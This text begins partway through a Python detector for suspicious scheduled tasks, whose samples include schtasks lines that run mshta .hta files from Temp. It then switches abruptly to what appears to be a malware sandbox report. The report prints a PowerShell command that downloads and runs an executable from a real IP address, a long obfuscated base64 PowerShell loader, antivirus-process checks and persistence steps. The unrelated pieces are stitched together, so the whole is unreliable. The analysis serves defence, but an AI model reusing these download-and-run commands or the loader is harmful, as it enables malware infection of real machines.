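    r'schtasks /create /tn fOXUema5SkW /tr "mshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'schtasks /create /tn "BlPWgmaPtNx" /tr "mshta \"C:\Temp\T914aIuR7.hta\"" /sc minute /mo 25 /ru "Admin" /f',
    r'schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe /full" /sc daily /st 02:00 /f',
]
# Constructed task definition of the kind a COM-API (ITaskService) registration leaves in
# C:\Windows\System32\Tasks; there is no schtasks.exe command line for such a task.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT25M</Interval></Repetition>
    <StartBoundary>2025-03-09T02:40:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>mshta</Command>
    <Arguments>C:\\Users\\Admin\\AppData\\Local\\Temp\\hlVunSjuK.hta</Arguments>
  </Exec></Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "cmd", "rundll32", "regsvr32"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
_ARG = r'(?:"((?:\\.|[^"\\])*)"|(\S+))'   # one quoted argument (with \" escapes) or one bare token


@dataclass
class TaskFinding:
    name: str
    action: str
    schedule: str
    interval_minutes: Optional[int]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def assess(name: str, action: str, schedule: str, interval: Optional[int]) -> TaskFinding:
    """Score a task on what it runs and how often, independent of how it was registered."""
    f = TaskFinding(name, action, schedule, interval)
    low = action.lower()
    tokens = low.split()
    host = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].removesuffix(".exe") if tokens else ""
    if host in SCRIPT_HOSTS:
        f.reasons.append(f"action is a script host / LOLBin ({host})")
    if re.search(r"\.(hta|vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b", low):
        f.reasons.append("action executes a script file")
    if any(p in low for p in USER_WRITABLE):
        f.reasons.append("action lives in a user-writable directory")
    if schedule == "minute" and (interval is None or interval <= 60):
        f.reasons.append(f"re-runs every {interval if interval is not None else 1} minute(s)")
    return f


def _opt(cmd: str, name: str) -> Optional[str]:
    m = re.search(r"(?i)\s/" + name + r"\s+" + _ARG, cmd)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def analyze_schtasks(cmd: str) -> Optional[TaskFinding]:
    """Parse a 'schtasks /create' command line; returns None for anything else."""
    if not re.search(r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b", cmd):
        return None
    mo = _opt(cmd, "mo")
    return assess(name=_opt(cmd, "tn") or "",
                  action=(_opt(cmd, "tr") or "").replace('\\"', '"'),
                  schedule=(_opt(cmd, "sc") or "").lower(),
                  interval=int(mo) if mo and mo.isdigit() else None)


def _iso_minutes(duration: str) -> Optional[int]:
    """ISO 8601 duration as stored in <Interval> (PT25M) to whole minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:\d+S)?)?", duration)
    return None if not m else sum(int(v or 0) * k for v, k in zip(m.groups(), (1440, 60, 1)))


def analyze_task_xml(xml_text: str, name: str = "") -> TaskFinding:
    """Assess a task from its XML definition, which is all a COM-API registration leaves behind."""
    root = ET.fromstring(xml_text)
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    args = root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS)
    interval = root.findtext(".//t:Repetition/t:Interval", default=None, namespaces=NS)
    triggers = {"BootTrigger": "onstart", "LogonTrigger": "onlogon", "CalendarTrigger": "calendar"}
    schedule = "minute" if interval else next(
        (v for k, v in triggers.items() if root.find(f".//t:{k}", NS) is not None), "once")
    return assess(name, f"{command} {args}".strip(), schedule, _iso_minutes(interval) if interval else None)
```

Feed analyze_schtasks with process-creation command lines and analyze_task_xml with the files under System32\Tasks (or the XML carried in Security event 4698); both paths produce the same TaskFinding, so one allow-list of known-good task names covers both registration methods.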
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2800 rapes.exe 2648 PfOHmro.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 2648 PfOHmro.exe 2068 powershell.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1988 powershell.exe 2576 powershell.exe 2664 powershell.exe 3060 powershell.exe 1988 powershell.exe 1988 powershell.exe 780 TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE 2320 483d2fa8a0d53818306efeb32d3.exe 2588 e267fb67b5.exe 2676 a221fd437d.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3868 powershell.exe 4020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 2648 PfOHmro.exe Token: SeDebugPrivilege 1772 tasklist.exe Token: SeDebugPrivilege 1984 tasklist.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 2440 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 2608 firefox.exe Token: SeDebugPrivilege 2608 firefox.exe Token: SeDebugPrivilege 3372 30c6dab708.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1960 iexplore.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1960 iexplore.exe 1960 iexplore.exe 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target count
PID 2304 wrote to memory of 2468 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 30 x4
PID 2304 wrote to memory of 2492 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 31 x4
PID 2468 wrote to memory of 2108 2468 cmd.exe 33 x4
PID 2492 wrote to memory of 1856 2492 mshta.exe 34 x4
PID 1856 wrote to memory of 2716 1856 powershell.exe 37 x4
PID 2716 wrote to memory of 2800 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 38 x4
PID 2800 wrote to memory of 2840 2800 rapes.exe 40 x4
PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 x9
PID 2840 wrote to memory of 3044 2840 PfOHmro.exe 42 x4
PID 2800 wrote to memory of 1316 2800 rapes.exe 44 x4
PID 1316 wrote to memory of 1736 1316 ReK7Ewx.exe 45 x4
PID 1736 wrote to memory of 1752 1736 cmd.exe 47 x4
PID 1736 wrote to memory of 1772 1736 cmd.exe 48 x4
PID 1736 wrote to memory of 788 1736 cmd.exe 49 x4
PID 1736 wrote to memory of 1984 1736 cmd.exe 51 x3 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe"C:\Users\Admin\AppData\Local\Temp\dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn A7XKlmaRIxe /tr "mshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn A7XKlmaRIxe /tr "mshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2108
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Users\Admin\AppData\Local\TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE"C:\Users\Admin\AppData\Local\TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 5008⤵
- Loads dropped DLL
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat9⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:788
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"9⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899199⤵
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi9⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges9⤵
- System Location Discovery: System Language Discovery
PID:2108
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com9⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q9⤵
- System Location Discovery: System Language Discovery
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe10⤵PID:2428
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:2760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Modifies system certificate store
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\mic800F.tmp.exeC:\Users\Admin\AppData\Local\Temp\mic800F.tmp.exe8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Windows\system32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"8⤵PID:352
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2936 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs8⤵PID:2148
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"9⤵PID:1648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ
@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ
@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
